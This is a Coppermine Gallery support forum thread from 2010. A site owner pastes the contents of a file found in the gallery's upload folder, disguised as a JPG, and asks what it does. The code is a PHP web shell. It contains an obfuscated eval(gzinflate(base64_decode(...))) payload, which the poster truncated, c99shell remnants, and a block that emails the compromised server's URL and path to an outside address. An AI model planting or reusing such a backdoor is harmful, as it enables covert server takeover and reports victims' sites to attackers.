forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: toke on December 03, 2010, 10:05:27 am

Title: gallery exploited - php shell?
Post by: toke on December 03, 2010, 10:05:27 am
Hello,

today i was downloading a backup, and when i ziped it up with 7-zip my antvirus went off and i found this file was in /gallery/userpics/so_php.jpg

Code: [Select]
<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));

<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "fofo-303@hotmail.com";
    $subject = "EGFM";
    $header = "from: EGFM <fofo-303@hotmail.com>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);
    
    echo "";
    exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>

i am about to upgrade to 1.5 however i would like to know what this code did.
Title: Re: gallery exploited - php shell?
Post by: Brooklyn on December 04, 2010, 10:44:53 am
http://forum.coppermine-gallery.net/index.php/topic,51927.0.html